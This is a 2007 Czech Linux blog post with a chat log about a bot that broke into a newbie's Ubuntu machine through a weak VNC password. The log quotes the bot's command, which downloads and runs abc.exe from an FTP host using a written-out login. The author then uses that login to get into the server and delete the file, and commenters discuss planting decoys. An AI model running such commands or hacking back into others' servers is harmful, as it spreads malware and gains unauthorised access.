abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 14:11 | IT novinky

    Řada vestavěných počítačových desek a vývojových platforem NVIDIA Jetson se rozrostla o NVIDIA Jetson Thor. Ve srovnání se svým předchůdcem NVIDIA Jetson Orin nabízí 7,5krát vyšší výpočetní výkon umělé inteligence a 3,5krát vyšší energetickou účinnost. Softwarový stack NVIDIA JetPack 7 je založen na Ubuntu 24.04 LTS.

    Ladislav Hagara | Komentářů: 1
    dnes 00:44 | Bezpečnostní upozornění

    Národní úřad pro kybernetickou a informační bezpečnost (NÚKIB) spolu s NSA a dalšími americkými úřady upozorňuje (en) na čínského aktéra Salt Typhoon, který kompromituje sítě po celém světě.

    Ladislav Hagara | Komentářů: 14
    včera 16:33 | IT novinky

    Společnost Framework Computer představila (YouTube) nový výkonnější Framework Laptop 16. Rozhodnou se lze například pro procesor Ryzen AI 9 HX 370 a grafickou kartu NVIDIA GeForce RTX 5070.

    Ladislav Hagara | Komentářů: 1
    včera 14:22 | IT novinky

    Google oznamuje, že na „certifikovaných“ zařízeních s Androidem omezí instalaci aplikací (včetně „sideloadingu“) tak, že bude vyžadovat, aby aplikace byly podepsány centrálně registrovanými vývojáři s ověřenou identitou. Tato politika bude implementována během roku 2026 ve vybraných zemích (jihovýchodní Asie, Brazílie) a od roku 2027 celosvětově.

    Fluttershy, yay! | Komentářů: 7
    včera 13:11 | Nová verze

    Byla vydána nová verze 21.1.0, tj. první stabilní verze z nové řady 21.1.x, překladačové infrastruktury LLVM (Wikipedie). Přehled novinek v poznámkách k vydání: LLVM, Clang, LLD, Extra Clang Tools a Libc++.

    Ladislav Hagara | Komentářů: 0
    včera 05:11 | Komunita

    Alyssa Anne Rosenzweig v příspěvku na svém blogu oznámila, že opustila Asahi Linux a nastoupila do Intelu. Místo Apple M1 a M2 se bude věnovat architektuře Intel Xe-HPG.

    Ladislav Hagara | Komentářů: 17
    26.8. 12:55 | IT novinky

    EU chce (pořád) skenovat soukromé zprávy a fotografie. Návrh "Chat Control" by nařídil skenování všech soukromých digitálních komunikací, včetně šifrovaných zpráv a fotografií.

    Ladislav Hagara | Komentářů: 59
    26.8. 12:11 | Nová verze

    Byly publikovány fotografie a všechny videozáznamy z Python konference PyCon US 2025 proběhlé v květnu.

    Ladislav Hagara | Komentářů: 0
    26.8. 11:55 | IT novinky

    Společnost xAI a sociální síť X amerického miliardáře Elona Muska zažalovaly firmy Apple a OpenAI. Viní je z nezákonné konspirace s cílem potlačit konkurenci v oblasti umělé inteligence (AI).

    Ladislav Hagara | Komentářů: 3
    26.8. 05:44 | Nová verze

    Byla vydána nová verze 9.16 z Debianu vycházející linuxové distribuce DietPi pro (nejenom) jednodeskové počítače. Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    Pro otevření více webových stránek ve webovém prohlížečí používám
     (78%)
     (9%)
     (3%)
     (4%)
     (5%)
     (1%)
    Celkem 101 hlasů
     Komentářů: 9, poslední dnes 11:53
    Rozcestník

    Jak je důležité mít silná hesla - příběh ze života

    8.3.2007 22:18 | Přečteno: 2611× | Linux | poslední úprava: 8.3.2007 22:20

    Jeden známej si nainstaloval Ubuntu a já ač fedorista se mu snažil jako nováčkovi některé věci vysvětlit a ukázat. Vysvětlil jsem mu jak si pustit VNC server a připojil se přes něj k němu. Po asi 2 hodinách vysvětlování jsem se odpojil. Pokračovalo to přibližně takhle (na konci happy end a lehké potrápení záškodníka):

    (20:28:31) Bbbbb: jo dobre ja to zkusim a divej co mi to zacalo vypisovat  terminalu kdyz ses
     odhlasil:
    _systemroot_<system#@<cmd.exe
    bash: system#@: No such file or directory
    user@ubuntu:~$ cmd {c echo open ftp.hypermart.net @! .. ik 7echo user joh joh .. ik 7echo binary
     .. ik 7echo get abc.exe .. ik 7echo bye .
    . ik 7ftp /n /v /s>ik 7del ik 7abc.exe 7exit
    bash: cmd: command not found
    user@ubuntu:~$ 
    
    
    (20:28:47) Bbbbb: zacalo se to tam samo psat jako kdyby to tam nekdo psal
    (20:30:03) Jirka: to je teda docela zmatek !?!
    (20:30:23) Jirka: to je windowsovy prikaz
    (20:30:31) Bbbbb: no vubec sem nechapal...fakt jako kdybys to tam psal ty...
    (20:30:43) Jirka: na me to nehodis ja jedu z linuxu :-D
    (20:31:14) Bbbbb: se mi tam asi nekdo vrtal :/
    (20:31:19) Jirka: ze by te nekdo nejak naboril?!? to se mi nechce verit
    (20:31:34) Jirka: ale jestli mas nejaky hodne jednoduchy heslo na roota....
    (20:32:23) Jirka: zkus netstat -n|less
    (20:32:42) Bbbbb: no na roota mam jednoduchy.... 5 cisel ale to vypadalo jako kdyby se
    tam ekdo rpipojil pres to vns nebo jak se tomu rika...
    (20:32:50) Jirka: ze zacatky jsou internetova spojeni
    (20:33:07) Jirka: sleduj co je v Foreign Address
    (20:33:26) Bbbbb: 
    tcp        0      0 192.168.1.98:40750      64.12.25.101:5190       SPOJENO    
    tcp        0      0 192.168.1.98:46621      64.12.29.68:5190        SPOJENO 
    (20:34:30) Bbbbb: to jsou dve ruzy IP....je nejaka tvoje?
    (20:35:02) Jirka: ja mam jinou
    (20:35:44) Bbbbb: tak to se nekdo na me pripojil teda ...
    (20:36:17) Jirka: divam se do /etc/services na port 5190 a vypada to na icq
    (20:36:24) Jirka: takze to bude asi v poradku
    (20:36:55) Bbbbb: aaaha...tak to jo . o ale stejne nechapu co se to tam zacalo vypisovat.... 
    no je to jedno..
    (20:37:19) Jirka: no v kazdym pripade davat poradny hesla
    (20:37:31) Jirka: jeste se muzes podivat do /var/log/
    (20:37:35) Bbbbb: jako na root?
    (20:37:38) Jirka: je tam spousta souboru
    (20:37:46) Jirka: poradny hesla na vsechno
    (20:38:00) Jirka: i kdyz ty roboti utoci na znama konta
    (20:38:20) Bbbbb: a co v tom /var/log
    (20:38:21) Jirka: tezko se nekdo bude snazit prihlasit na to tvoje jmeno uzivatele
    (20:39:00) Jirka: je tam urcite messages a mozna secure
    (20:39:14) Jirka: melo by tam byt kdo se kdy hlasil pres ssh...
    (20:39:46) Bbbbb: nj...ale nechapu kdo mi tam zacal psat prikazy:
     _systemroot_<system#@<cmd.exe
     cmd {c echo open ftp.hypermart.net @! .. ik 7echo user joh joh .. ik 7echo binary .. ik 
    7echo get abc.exe .. ik 7echo bye .. ik 7ftp /n /v /s>ik 7del ik 7abc.exe 7exit
    
    (20:44:52) Jirka: tak jsem trochu premyslel
    (20:45:22) Jirka: a myslim se nejaky robot ocuchval otevrene porty kde bezi vnc
    (20:45:29) Jirka: a zkusil se prihlasit
    (20:45:53) Jirka: protoze tam bylo hodne primitivni heslo 12345, tak se mu to podarilo
    (20:46:32) Jirka: nastesti prepokladal, ze se prihlasil na windowsy (je to jen blbej robot)
     a snazil se spustit tehle prikaz
    (20:46:41) Bbbbb: smejd...a co to jako je za roboty? co maj delat?
    (20:46:57) Jirka: tedy stahnout z toho ftp nejakyho trojana a spustit ho
    (20:47:15) Jirka: schalne se tam mkrnu ;-)
    (20:47:20) Bbbbb: v tomhletom je linux asi bezpecnejsi ze
    (20:48:20) Jirka: $ ftp ftp.hypermart.net
    Connected to ftp.hypermart.net.
    220 FTP Server ready
    500 AUTH not understood
    500 AUTH not understood
    KERBEROS_V4 rejected as an authentication type
    Name (ftp.hypermart.net:jirka): joh
    331 Password required for joh.
    Password:
    230 User joh logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    227 Entering Passive Mode (38,113,1,151,148,36)
    150 Opening ASCII mode data connection for file list
    -rw-r--r--   1 joh      www         52224 Mar  8 07:29 abc.exe
    -rw-r--r--   1 joh      www        302303 Mar  5 03:02 light.exe
    -rw-r--r--   1 joh      www         36700 Mar  6 03:16 spoolsq.exe
    -rw-r--r--   1 joh      www         36714 Mar  5 03:02 vncfull.exe
    226 Transfer complete.
    ftp> 
    (20:48:33) Bbbbb: co mi doporucujes za ftp klienta
    (20:48:33) Jirka: jak jsem predpokladal ma to tam
    (20:49:06) Jirka: :-D ted jsem ho smejda vyradil :-)
    (20:49:09) Jirka: ftp> del abc.exe
    250 DELE command successful
    ftp> dir
    227 Entering Passive Mode (38,113,1,151,207,228)
    150 Opening ASCII mode data connection for file list
    -rw-r--r--   1 joh      www        302303 Mar  5 03:02 light.exe
    -rw-r--r--   1 joh      www         36700 Mar  6 03:16 spoolsq.exe
    -rw-r--r--   1 joh      www         36714 Mar  5 03:02 vncfull.exe
    226 Transfer complete.
    ftp> 
    (20:49:37) Jirka: maznul jsem mu to abc.exe co se snazi kopiravt na ty cizi stroje
    (20:49:54) Bbbbb: a jak jsi zjistil jmeno a heslo?
    (20:50:08) Bbbbb: to ftp je primo aplikace kterou bych tu mel mit taky ze
    (20:50:10) Jirka: je to na tom radku co jsi mi poslal
    (20:50:13) Jirka: jo
    (20:50:44) Bbbbb: user je joh a heslo taky joh?
    (20:50:48) Jirka: jo
    (20:51:53) Bbbbb: to jsou mi veci....fakt zajimavy
    
           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    9.3.2007 01:01 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Co k tomu zbývá dodat? Snad jenom ďábelský smích ;-)
    Quando omni flunkus moritati
    9.3.2007 05:55 wo | skóre: 2 | blog: wo
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Snad by bylo lepší onen abc.exe nahradit něčím nefunkčním ... pak si změny všimnou o nějakou chvíli déle ;-)
    David Watzke avatar 9.3.2007 06:38 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Dal jsem tam texťáky se stejnými názvy a velikostmi...
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    9.3.2007 08:40 LuděkS | skóre: 31 | blog: publish | Liberec
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Pěkná práce :-). Ještě by to chtělo zachovat datum ;-)
    xvasek avatar 9.3.2007 08:44 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    a MD5. :)
    David Watzke avatar 9.3.2007 12:51 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Nějak si nemůžu vzpomenout čím se to mění :-/
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    9.3.2007 15:35 rastos | skóre: 63 | blog: rastos
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    touch
    David Watzke avatar 9.3.2007 16:41 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Ten umí změnit jen atime a mtime - potřebuju změnit i ctime :-/
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    9.3.2007 08:56 Jiří Lisický | skóre: 31 | blog: JIL_blog | Olomouc
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Dík ;-) Taky jsem si pak říkal, že bych tam měl něco podstrčit, ale už jsem se na to vykašlal. No jo to jsou ty výhody opensource :-)
    xvasek avatar 9.3.2007 08:18 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Tipnul bych, že na ftp.hypermart.net netuší, že mají i tento "hosting"...
    belisarivs avatar 9.3.2007 11:14 belisarivs | skóre: 22 | blog: Psychobláboly
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Nemelo by se jim to nahlasit? Myslim, ze melo. Udelate to nekdo?
    IRC is just multiplayer notepad.
    9.3.2007 08:35 LuděkS | skóre: 31 | blog: publish | Liberec
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Hezký příběh :-). Přiznám se, že VNC nepoužívám - (maximálně tak výjimečně ve vnitřní síti) ale ven bych si s ním tedy netroufl. Myslím, že Bbbbb má slušný úvodní zážitek. Aspoň ocení výhody Linuxu :-D
    rincewind avatar 9.3.2007 08:45 rincewind | skóre: 14 | blog: Bloguji,_tedy_jsem? | Hermanova Hut
    Rozbalit Rozbalit vše Re: Jak je důležité mít silná hesla - příběh ze života
    Tohle uz jsem taky potkal :) docela zajimavy zpusob utoku a prekvapilo me, ze se to pripojovalo pres t-mobile, ale ve chvili kdy se mi vyhodil dotaz jestli pripojit tak jsem ho stopnul :) a prenastavil iptables :)

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.